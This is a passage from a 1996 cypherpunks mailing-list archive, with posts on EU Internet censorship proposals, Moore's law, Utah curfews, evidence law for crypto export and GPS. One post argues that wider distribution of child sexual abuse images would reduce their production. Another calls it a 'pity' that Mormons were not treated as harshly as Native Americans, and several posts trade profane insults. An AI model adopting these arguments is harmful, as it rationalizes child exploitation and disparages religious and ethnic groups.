]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]- -----END PGP PUBLIC KEY BLOCK----- ] ] ] ]-----BEGIN PGP SIGNATURE----- ]Version: 2.6.3ia ]Charset: cp850 ] ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh ]2Wqa5+h8R7g= ]=/M2U ]-----END PGP SIGNATURE----- ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org ] Http://www.cryptography.home.ml.org/ ] Email for PGP public key, ID: 5BBFAEB1 ] "Don`t forget to mount a scratch monkey" From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 19:35:30 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 10:35:30 +0800 Subject: European Censorship Proposals Message-ID: <01IA2ANWJV3K8Y56RA@mbcl.rutgers.edu> > _________________________________________________________________ > Centura > _________________________________________________________________ > EURO-COMMISSION TO TACKLE PORN ON INTERNET > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BRUSSELS (Sep 24, 1996 08:06 a.m. EDT) - The European Commission, > faced with calls to clamp down on use of the Internet to transmit > pornography following a Belgian paedophilia scandal, will take a first > step in October towards seeing how it can be done. > But Culture Commissioner Marcelino Oreja, who intends to unveil a > discussion paper on new media services on October 9, says that the > process will be a lengthy one in consultation with all concerned and > that at the end of the day a world solution could be needed. [...] > "We have to find mechanisms to see first how we can find the author > who includes this pornography in the Internet and second how we can > encrypt the content of these messages," he said. > The call for a European-wide solution to pornography and paedophilia > on the Internet is expected to be a central theme for EU justice > ministers in Dublin on Thursday and Friday when they discuss ways of > fighting the child sex trade. > EU culture ministers could also discuss it at their own meeting in the > Irish town of Galway on Wednesday. > The discovery of four murdered girls in Belgium and a child murder, > prostitution and pornography ring has focused the world's attention on > the child sex trade and fuelled calls for a clamp down on the > Internet, which at the moment is little policed and where anonymity is > assured. > Oreja said among the options raised in the discussion paper were the > possibility of encrypting access so that only those who pay could see > the material, or including a special computer chip -- commonly known > as a V-chip -- to screen against pornographic content. The obvious solution to this is someone in an unregulated country getting a couple chips or programs for the de-encryption, then making the images/text/whatever freely available. The major hurdles for this are A. digital watermarking to see which chip(s) are used then block their ability to be used (a reason to get more than one chip/program so as to compare to filter out the watermarking - some techniques for watermarking will survive this, but most won't) and B. copyright laws in the countries which do not enforce such provisions. [...] > Oreja, aware that Internet servers can simply move to a neighbouring > country to get round any restrictions agreed at European level, said > problems with satellite television had shown that national and > European regulations were not enough. > "We know that national regulation is not enough, that European > regulation is not enough...We may need to have a world regulation of > these matters, but let's go step by step. We do not have a European > regulation," he said. If they seriously think this will happen, they need to take another look at the international situation. > The idea of a professional code of ethics in which the media would > regulate themselves is acknowledgment that European regulation of the > Internet could face opposition on freedom of information grounds. > "I think everything can not be said. I think that violence can have > its limits, I think that pornography can have its limits. I am in > favour of that, but it can be that the sector itself prepares a code > of ethics," he said. That's funny, if I were in favor of any censorship it would be of government propaganda such as this.... they seem to be calling for violence on a rather frequent basis. > He said such a code could help get round wide differences between EU > member countries, who have widely differing laws on what can be > considered pornography and eroticism. > Copyright © 1996 Nando.net From jimbell at pacifier.com Sun Sep 29 19:40:01 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 10:40:01 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609292339.QAA17774@mail.pacifier.com> At 12:16 PM 9/29/96 -0800, Timothy C. May wrote: >At 11:50 AM -0800 9/29/96, jim bell wrote: >>At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: >>>(Hoist by their own petards indeed! Don't tell our Russian what petard >>>means.) >> >>Uh, wasn't that the name of the bald captain on Star Trek Next Generation? >>You know, "Jean-Luc Petard"? > >Picard. I forgot the smiley B^) >> The succeeding >>factor-of-1000 improvement appears (if the item above is accurate) to have >>taken 24 years to accomplish, so it's hard to imagine that the next factor >>of 1000 will arrive appreciably sooner than year 2020. > >I agree. (Actually, it was a factor of 4000 since it was only 64 processors, but who's counting?) Anyway, this reminds me: What was Moore's law? Performance doubling every 18 months as I recall? How does this stack up? Well, 24 years is 16 times 18 months, so the increase in performance should have been 2**16, or 64K. Off by a factor of 16, which is fairly close, as exponential expansions go. If I were inclined to make the numbers fit the theory, I would argue that the design for the Illiac IV was probably based on SSI IC technology that was defined in 1966 or so, which would provide the extra 6 years (four doubling periods) which account for the "error." One of the advantages of modern CAD technology is that chips can go from foundry to a working computer far faster. A few months ago, there was an item about how IBM had demonstrated its ability to produce 0.08 um silicon chips, with a gate delay (don't recall how loaded this was...) of about 24 picoseconds. Such a process could probably be used to produce a single chip that can do about 1 giga operations per second, assuming it was pipelined adequately. But even that's "only" a teraflop with 1000 such chips...It makes me wonder what kind of a rabbit they're gonna pull out of the hat to produce a petaflop. >By the way, I knew some of the folks who worked on parts of the >Illiac-IV, which was still limping along as late as the late 70s (maybe >later). I think it was turned off in about 1982 or 1983. I did a web-search on its history a few months ago. >>Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz >>chip for about $135, while they sell a 200-megahertz version for around $550 >>or so. Arithmetic suggests that a person would be far better off with a >>4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, >>200-megahertz version. (admittedly, peripheral logic costs will adjust this >>a little.) Of course, this would also leave Intel flat on its ass >>attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed >>per cpu is just about the only advantage they have. > >Intel is having no problem at all competing with AMD and Cyrix! Both of >them are struggling---AMD just announced a layoff, and Cyrix is facing >financial troubles. Neither are able to make competitive parts, for reasons >I won't go into here, and neither are making the money they'll need to >compete in the future with Intel. (Intel has half a dozen billion-dollar >wafer fabs, running with extraordinarily high yields--so my sources tell me >:-})--and the more money they make, the more factories they build, the more >they learn about how to make 0.35 and 0.25 micron chips, etc.) True, but the world would be FAR better off if the architecture for the commonly-used PC could be extended to allow multiple processors. Yes, I'm aware of the inefficiency issues associated with multiple processors, but I think the dramatic cost reductions associated with the use of larger numbers of cheaper CPU's would much more than compensate for them. As I see it, there are inefficiencies associated with both making a single CPU do multiple tasks, as well as making multiple CPU's do a single task. The former is one of the reasons that PC's have pretty much mopped the floor with mainframes, because the PC's were not "unfairly" hobbled with having to implement complicated time-sharing software. The latter is the classic problem which kept prople from going to massively parallel machines from scalars. However, I don't think that most of the problems a typical PC accomplishes are those "hard to divide" problems that resist parallel implementation. Rather, a multiprocessor PC would assign larger tasks (programs) to individual CPU's and not try to break up a program. Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 19:43:45 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 10:43:45 +0800 Subject: More on European Censorship Message-ID: <01IA2ASHUV7O8Y56RA@mbcl.rutgers.edu> > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > EU TO ACT AGAINST INTERNET CHILD EXPLOITATION > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BRUSSELS (Sep 29, 1996 00:12 a.m. EDT) - European Union > telecommunications ministers, reacting to a child-sex scandal in > Belgium, pledged Friday to consider ways to keep illegal material that > could harm children off the Internet. > Belgian Telecommunications Minister Elio Di Rupo announced that his > government planned to implement new measures requiring Internet access > providers to monitor and report material featuring sexual abuse or > exploitation of children. > He asked his colleagues to join forces with him. > "Today a big legal vacuum exists, for legislation is falling behind > technological evolution," he said, according to a speaking note that > was distributed to reporters. > "There is a big risk that it will create an enormous market of > children fed on by criminals." Market? Wider distribution of such pictures will lead to _decreased_ production, for the simple reason that the producers won't be able to go to courts for stopping copyright violations, so they can't make any money. > The ministers agreed to expand a working party that has already been > set up to look at the question of illegal material on the Internet and > asked it to come up with concrete proposals before they meet again in > November. > The group will include representatives of the 15 EU telecoms > ministries and of companies that provide access to online services or > prepare the content, a statement adopted by the ministers said. [...] > But some of the telecoms ministers, including those from Britain and > Sweden, warned that the EU could not wander into censorship and had to > focus on fighting truly illegal material. > British Science and Technology Minister Ian Taylor advocated a > self-regulatory system that was announced in his country earlier this > week. > Two British trade associations announced that an independent body, the > Safety Net Foundation, would be established to rate material carried > on the Internet and to set up a "hotline" service to receive > complaints about illegal material. > They said Internet service providers would also adopt policies for > removing illegal material and reducing the scope for subscribers to > act with untraceable anonymity. I suspect that any anonymous remailers operating in Britain may want to look out for ISP interruptions... > Swedish Communications Minister Ines Uusmann told reporters that EU > countries needed to exchange ideas and to speak with one voice in > tackling a global problem. [...] > Copyright © 1996 Nando.net From Ryan.Russell at sybase.com Sun Sep 29 19:58:08 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Mon, 30 Sep 1996 10:58:08 +0800 Subject: Utah as a Religious Police State Message-ID: <9609300033.AA05981@notesgw2.sybase.com> Hmm...never heard that one before. Care to produce a reference? (Or am I supposed to be ignoring this guy when he makes ridiculous claims?) Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp Date: 09/29/96 05:54:09 PM Subject: Re: Utah as a Religious Police State Ryan Russell/SYBASE writes: > I guess that depends on your definition of liberty. The Mormons > originally moved there to have a place to practice their religion, > and have freedom from persecution. I suppose one could extend that > to wanting a place to have the freedom to have a set of rules consistant > with their beliefs. Should that include freedom from interferance from > folks such as yourself who want to change their rules, even though > you're not presently effected? It's worth noting that one of Utah mormons favorite pastimes was to ambush the settlers heading for California, kill them all, and take their property. However the mormons were dealt with much less severely than the local Indians who tried the same tricks. Pity. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From Ryan.Russell at sybase.com Sun Sep 29 20:02:23 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Mon, 30 Sep 1996 11:02:23 +0800 Subject: Utah as a Religious Police State Message-ID: <9609300031.AA05971@notesgw2.sybase.com> Yes, my mail gateway sometimes does rude things to the mail headers...Just ignore it :) Anyway, you mave have a clear cut line between who gets to control kids, but I think it may not be so clear as you make it out to be. Why should you be able to say what times you kids have to come in? Why should you be able to limit their civil liberties? Because you are the parent? Why should that be any better reason than because they're the government? Is it your God-given right as a parent? (Don't answer that, I don't even want to start on religion with this crowd..) Conversly, if you think a parent has the right, why shouldn't a group of parents (who agree) be able to set some rules? Why not a town? These were originally nearly all-Mormon areas...Why shouldn't they be allowed their rules just because a non-Mormon chooses to move in? One might argue "if you don't like the rules, don't live there." I suppose you aren't familiar with the rules for participating in church activities, or attending BYU. The rules are generally very simple, live by the Mormon standards, or don't participate. So, that means that students at BYU can't smoke, drink, etc... So is the line between "public" and "private"? i.e. if BYU were an even partially publically funded school, they shouldn't be allowed to have any but the lowest-common-denominator rules? That sounds overly arbitrary to me, and doesn't appeal to the spark on libertarian I have :) Seriously, since laws are all based on a publically held set of morals, why shouldn't some places be able to have a higher set of standards than others. I think that's part of the arguement for state's rights. After all, we allow a lower than normal set of standards (Nevada.) Ryan ---------- Previous Message ---------- To: cypherpunks cc: cypherpunks From: tcmay @ got.net ("Timothy C. May") @ smtp Date: 09/29/96 01:17:46 PM Subject: Re: Utah as a Religious Police State (I received this message, with "cypherpunks at sybase.com" as well as "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for the Cypherpunks list, with some sybase domain name weirdness, or reflector, going on.) At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: >I guess that depends on your definition of liberty. The Mormons >originally moved there to have a place to practice their religion, >and have freedom from persecution. I suppose one could extend that >to wanting a place to have the freedom to have a set of rules consistant >with their beliefs. Should that include freedom from interferance from >folks such as yourself who want to change their rules, even though >you're not presently effected? Well, if Utah can rig a way to _secede_ from the Union, your arguments would make more sense. But so long as they are part of these United States, their religious beliefs about when children should be at home cannot supersede basic liberties. (There are some thorny issues about whether _minors_ have full civil rights. But I certainly know that _my_ civil rights are being affected when my children are not allowed on the streets after some hour. If my child is out, this is my problem. I neither want cops to stop-and-detain my children, nor do I want my tax monies to be used to control the behavior of other people's children. Providing no crimes are being committed, curfews for the sake of controlling the behavior of children are no more just than would be a bunch of related behavior control laws, e.g., a ban on comic books, a mandate that all children join after-school youth leagues, etc.) As for "changing their rules," you're missing the point. There are presumably many in Utah who believe as I do (maybe even some Mormons). Those who are living in Utah, as renters, owners, whatever, should not be bound by unconstitutional rules, no matter how many Mormon Elders favor them. Unless the Mormons own _all_ of the property (and maybe not even then, as renters have civil rights), they cannot impose their own notions of morality on the rest of the population, except in compelling cases (e.g., involving the well-known actual _crimes_). I don't mean to pick on Mormons, as other communities have also attempted to impose curfews and other restricitions on the children of others. My ire was raised by Attila's enthusiastic support for laws which no freedom-loving person should be enthusiastic about. Again, I have no problem with Attila restricting his own children's movements, or joining with other parents to control the behavior of their _own_ children, via religious camps, religious schools, youth leagues, etc. He can even make his own kids wear funny uniforms, funny religious hats, whatever. But, for example, tellling _me_ when _my_ children may be out on public streets (doing nothing illegal, neither robbing nor spray-painting nor committing any other real crimes) is unacceptable. I urge Attila (and others) to rethink enthusiastic support for curfews. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gdcochra at utep.edu Sun Sep 29 20:21:57 1996 From: gdcochra at utep.edu (Gerard D. Cochrane Jr.) Date: Mon, 30 Sep 1996 11:21:57 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: Sorry about this message that went out. Looks like I got a few idiot sending messages from a hacked account. Sorry for the waste of bandwith. Thanks. Jerry On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote: > On Sun, 29 Sep 1996, Brian Davis wrote: > > > On Fri, 27 Sep 1996, Timothy C. May wrote: > > > > > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > > > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > > > > > >His admission that he used the notebook. Recovering the notebook and > > > >finding the software. Interviewing the Customs agent working at the time. > > > > > > His admission that he used _which_ notebook? Chain of evidence again. > > > > > > Finding _which_ software? > > > > > > (As for the Customs agent, I can assure you that my luggage has never been > > > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > > > Customs could figure out who was working at the time I putatively entered > > > the country, and even if he remembered _me_, months later, just what > > > records would he have, and how would they stand up in court?) > > > > > > Hearing me say I "exported crypto," a hearsay claim, and happening to find > > ^^^^^^^^^^^^^^^ > > It is an admission against interest and a confession; it is admissible > > against the speaker in a prosecution against him for "exporting crypto" > > from a strictly evidentiary standpoint. > > > > > one or more laptops at my home, weeks or months later, implies nothing. (To > > > make the point graphically, suppose the raiding party finds _several_ > > > laptops or notebooks...do they assume _all_ were taken out of the country, > > > or do they pick the one with the most incriminating software on it? Answer: > > > Unless they can _prove_ one of them was used, and that it had not been > > > _changed_ since the putative event (highly unlikely), they cannot simply > > > _assume_ one of them was taken out. > > > > Your understanding of evidence is inaccurate. The evidence re the > > laptop[s] would be admissible and the parties would argue about what it > > meant. The jury is entitled to draw common sense inferences. That might > > be easy to do in a case in which a defendant has confessed.... > > > > > > > > > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > > > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > > > So? I installed it last week. My trip to Europe was last summer.") > > > > So now you, as your own lawyer (apparently) have decided to take the > > stand and testify. Remember that the prosecutor gets to cross-examine > > you. Things are about to get ugly.... > > > > > > > > > > >Considering the headaches required for airline travel today, it's not like > > > >there aren't serious records abound. > > > > > > Such as? I recall no inspections of my luggage, no inventorying of the > > > serial numbers of my laptops, no inspection whatsoever of my > > > magneto-optical drives (which were in my carry-on luggage, and not even > > > glanced at, in the box they were in). X-rays would not prove what was taken > > > in or out of the country, even if "x-ray escrow" were implemented (which it > > > is not, according to all reports I have heard, and based on some practical > > > limits on storage), I doubt the records of a trip, say, last summer (of > > > '95) could be retrieved and prove that a particular laptop was taken out. > > > Not to mention that the software allegedly taken out might have been on any > > > kind of media, none of them distinguishable with an x-ray machine. > > > > Circumstantial evidence is admissible if probative of a fact at issue in > > the case. Evidence that you took a laptop out of the country is > > probative of the allegation that you exported crypto using a laptop. > > > > > > > > > >For crying outloud, he admitted to the world that he took the software > > > >out. I put that in front of a jury and it looks just like the typical > > > > > > "For crying out loud" is bluster, not legal argument. > > > > And your understanding of evidence shows a misunderstanding of how the > > rules of evidence actually work in a courtroom. > > > > > > > >stupid bragging criminal. Any defense about "I was just kidding" or "The > > > >message was forged" might be interesting, but it will sound like > > > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > > > > > Legal proof is still needed. Given only a nebulous statement like "I > > > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > > > is not enough for a case even to be brought to trial. > > > > You are absolutely wrong. It may not be enough for a conviction, but it > > will beat a Rule 29 motion (Motion for a judgment of acquittal) and get > > the case to the jury. > > > > > (If it reached trial, I would expect a defense attorney to move for > > > dismissal. Absent any evidence that a crime occurred, absent any proof > > > beyond the nebulous hearsay statement of a "braggart," there is simply no > > > basis for criminal action.) > > > > > > "Stupid bragging criminals" may be common, but bragging is not in and of > > > itself illegal. There still has to be evidence of a crime. > > > > Must a jury believe that you were "just bragging" because you now, in a > > criminal trial, say that you were? > > > > > > > "Produce the body." > > > > Perry Mason is only active in re-runs. > > > > > > > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > > > body, or witnesses, does this mean I'll be found guilty? To use BU's > > > phrasing, "for crying out loud.") > > > > That's where prosecutorial discretion comes in and a judge's and jury's > > common sense comes in if the prosecutor runs amok. > > > > BTW, I am far more willing to believe you were bragging about whacking > > Jimmy Hoffa than about exporting crypto. Think of all the interesting > > evidence from this mailing list's archives that prosecutors would attempt > > to introduce against you ... > > > > Not to say that *I* couldn't get you off, but not the way you propose. > > > > EBD > > > > > > > > > --Tim May > > > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > > > ---------:---------:---------:---------:---------:---------:---------:---- > > > Timothy C. May | Crypto Anarchy: encryption, digital money, > > > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > > > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > > > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > > > "National borders aren't even speed bumps on the information superhighway." > > > > > > > > > > > > > > > > > > > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. > YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE > FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY > TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE > YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It's better to be thought a fool, then to open your mouth and prove it. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A mind is like a parachute, it only works when it is open. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ----------------------------------------------------------------- Gerard D. Cochrane Jr. Software System Specialist II Systems Programmer University of Texas at El Paso Phone: (915) 747-5256 Fax: (915) 747-5067 E-mail: gdcochra at mail.utep.edu -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAzFsQbcAAAEDAKaA49HDrO1mQQiC1YZ1WqXxggOmd98l2ArWyWLi64XUzyQp JgVdv0svCAoFLj0UDQ5iqsWkznZXD4di8exS0Bq+1C/dXacEPwiQMR28gF3+ATxD kw0UAW22cbNE7KxgRQAFEbQIZ2Rjb2NocmE= =3OP7 -----END PGP PUBLIC KEY BLOCK----- From dustman at athensnet.com Sun Sep 29 20:24:26 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Mon, 30 Sep 1996 11:24:26 +0800 Subject: Key-Escrow In-Reply-To: <960929141327_113858214@emout06.mail.aol.com> Message-ID: <199609300025.UAA09373@godzilla.athensnet.com> : Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these : are like, gonna be my keys. At 15 bucks a pop, even Bill Gates couldn't afford to register that many keys. From ponder at freenet.tlh.fl.us Sun Sep 29 20:35:12 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Mon, 30 Sep 1996 11:35:12 +0800 Subject: GPS [MARGINAL, at best] Message-ID: There was an article in _Scientific American_ February 1996 about GPS. I couldn't find the magazine, but they had this squib on the www.sciam.com website: �The Global Positioning System� Thomas A. Herring Two dozen satellites hovering thousands of miles up can locate your position on the earth's surface to within a few centimeters. Originally constructed for military applications, this network of space beacons today finds civilian applications--such as landing airplanes in fog--that demand accuracy beyond what its designers had thought would be technically possible. According to the website, there was also a letter in the June 1996 issue responding to Herring�s article. Here it is: MILITARY ADVANTAGE I was pleased when I first saw your February article "The Global Positioning System," by Thomas A. Herring. As developers and operators of GPS, we in the Department of Defense and our partners in industry are justifiably proud of the technology. GPS represents the best of American scientific and technical ingenuity as well as being an excellent example of cooperation between the military and civilian sectors. But after reading the entire article, I was disappointed by its unbalanced discussion of the national security aspects of GPS. Yes, the Defense Department does operate GPS with unpopular security features. But these features were not designed to inconvenience the peaceful users of the system, as Herring implies. Rather they were designed to provide U.S. and allied forces with a crucial military edge. Furthermore, the Defense Department is well aware that the security aspects of GPS are an additional burden for many users. And while we believe such measures are still needed at this time to help preserve our military advantage, we have set a goal of discontinuing regular use of the feature known as Selective Availability, the component that degrades GPS accuracy, within a decade. Both time and resources are needed to replace the advantages Selective Availability provides. In light of the revolutionary contributions of GPS to both military and commercial enterprise, Herring could have portrayed the technology in a more evenhanded manner. PAUL G. KAMINSKI Under Secretary Department of Defense -- end of quoted material -- The article, as I recall, was about ways in which civilian users have found, or are finding, ways around the built-in inaccuarcy of the GPS. I don't recall whether crypto was mentioned in the article. My recollection of it was that they had been diddling with the timers or the clock signal or something, as opposed to encrypting anything. But then again it has been a while, and my memory of it isn't too clear. I seem to remember another crypto scheme discussed here at length about GPS, based on a paper by Dr. Dorothy [?] Denning, which involved having the intended recipient's coordinates - which were somehow involved in the encryption. The coordinates are in 3-D. Spheres centered on three of the GPS satellites intersect within a very small space. -- public service announcement: ------------------------------------------------------------- To remove yourself from the cypherpunks mailing list send to: majordomo at toad.com a message that contains the text: unsubscribe cypherpunks in the body of the message, not the subject line. -------------------------------------------------------------- From dlv at bwalk.dm.com Sun Sep 29 21:44:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 12:44:36 +0800 Subject: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May In-Reply-To: <199609300138.AA08482@crl12.crl.com> Message-ID: berserk Timmy May has gone . Has he been eating speed? bananas >From: Troy Varange >Message-Id: <199609300138.AA08482 at crl12.crl.com> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 3442 > >> >> What has Timmy been smoking? >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 >> ]Received: by bwalk.dm.com (1.65/waf) >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT >> ] for dlv >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; >> ] 29 Sep 96 15:59 BST >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net >> ] id aa09441; 29 Sep 96 15:54 BST >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 >> ]Comments: Authenticated sender is >> ]From: paul at fatmans.demon.co.uk >> ]To: "Dr.Dimitri Vulis KOTM" >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 >> ]Mime-Version: 1.0 >> ]Content-Type: text/plain; charset=US-ASCII >> ]Content-Transfer-Encoding: 7BIT >> ]Subject: Re: Possible subs attack???? >> ]Priority: normal >> ]X-Pm-Encryptor: JN-PGP-P, 4 >> ]X-Mailer: Pegasus Mail for Windows (v2.31) >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> >> ] >> ]-----BEGIN PGP SIGNED MESSAGE----- >> ] >> ] >> ]> The lying sack of shit Timmy May writes: >> ] >> ]> The lying sack of shit Timmy May lies again, as usual. >> ] >> ]Fuck you, >> ] >> ]I am not Tim May, Check out the return path if you don`t believe me, >> ]if you still don`t here`s my PGP public key signed by the EFF, they >> ]don`t sign keys here and there without checking ID`s... >> ] >> ]Type Bits/KeyID Date User ID >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley >> ] >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- >> ]Version: 2.6.3ia >> ] >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi >> ]mUqFH41Z7NkyO8ZFdi5GGX0= >> ]=CMZA >> ]- -----END PGP PUBLIC KEY BLOCK----- >> ] >> ] >> ] >> ]-----BEGIN PGP SIGNATURE----- >> ]Version: 2.6.3ia >> ]Charset: cp850 >> ] >> 